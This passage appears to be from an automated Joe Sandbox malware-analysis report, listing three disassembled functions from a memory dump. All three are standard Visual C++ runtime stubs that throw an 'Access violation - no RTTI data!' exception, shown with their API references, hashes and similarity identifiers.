                                          Function 6E397B1A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 6E397B26
                                          • _CxxThrowException.VCRUNTIME140(?,6E39FC88), ref: 6E397B4D
                                            • Part of subcall function 6E397E10: RaiseException.KERNEL32(E06D7363,00000001,00000003,R{9n,?,?,?,?,6E397B52,?,6E39FC88), ref: 6E397E70
                                          Strings
                                          • Access violation - no RTTI data!, xrefs: 6E397B1D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Exception$RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                          • String ID: Access violation - no RTTI data!
                                          • API String ID: 2197136450-2158758863
                                          • Opcode ID: 3217e5fb1f9c41a519728ff3170954ade2cecca36cbbbe43a53af8cae13402dc
                                          • Instruction ID: 8b64bd804971b37a31908f12e8ce62f2bfd97f4f79784932439b22b2570d403a
                                          • Opcode Fuzzy Hash: 3217e5fb1f9c41a519728ff3170954ade2cecca36cbbbe43a53af8cae13402dc
                                          • Instruction Fuzzy Hash: ACC01232C0410C6EDB04D6E0D906CDEB3AC9909200F700C42E650A60C0F721FD596630
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E397BC4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 6E397BA3
                                          • _CxxThrowException.VCRUNTIME140(6E39FBD8,6E39FC6C,6E39FBD8,00000014,?,6E39FC88), ref: 6E397BE7
                                            • Part of subcall function 6E397E10: RaiseException.KERNEL32(E06D7363,00000001,00000003,R{9n,?,?,?,?,6E397B52,?,6E39FC88), ref: 6E397E70
                                          Strings
                                          • Access violation - no RTTI data!, xrefs: 6E397BC7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Exception$RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                          • String ID: Access violation - no RTTI data!
                                          • API String ID: 2197136450-2158758863
                                          • Opcode ID: 0be8cbf39e9cf2ac2c71434ab41243e4b01e20162559ae593dfa9bd06991fcee
                                          • Instruction ID: 10dd8748450b4f0f551bede1e22339cb5d4fca432cce72e8094c8dae3736f5b9
                                          • Opcode Fuzzy Hash: 0be8cbf39e9cf2ac2c71434ab41243e4b01e20162559ae593dfa9bd06991fcee
                                          • Instruction Fuzzy Hash: 69D0C936D5810CAE9A1CD6E0D5468DEB3ACDD09214F200C42E750AF5C0F772BD616676
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E397A3E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 6E397A4A
                                          • _CxxThrowException.VCRUNTIME140(?,6E39FC14), ref: 6E397A5A
                                            • Part of subcall function 6E397E10: RaiseException.KERNEL32(E06D7363,00000001,00000003,R{9n,?,?,?,?,6E397B52,?,6E39FC88), ref: 6E397E70
                                          Strings
                                          • Access violation - no RTTI data!, xrefs: 6E397A41
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Exception$RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                          • String ID: Access violation - no RTTI data!
                                          • API String ID: 2197136450-2158758863
                                          • Opcode ID: 16197081011d3bad867de2a7841ac6eb65ab27f18cf5aa89a13215017781a318
                                          • Instruction ID: 5ae77f7100b2f946d0c34affc08c91cf627b11b8924328ca481fe13a422ac1c5
                                          • Opcode Fuzzy Hash: 16197081011d3bad867de2a7841ac6eb65ab27f18cf5aa89a13215017781a318
                                          • Instruction Fuzzy Hash: 82C00272C1410C6EEB04E6E0994ACDEB3AC9909214F700C56EA60A61C0FB65FE696A64
                                          Uniqueness

                                          Uniqueness Score: -1.00%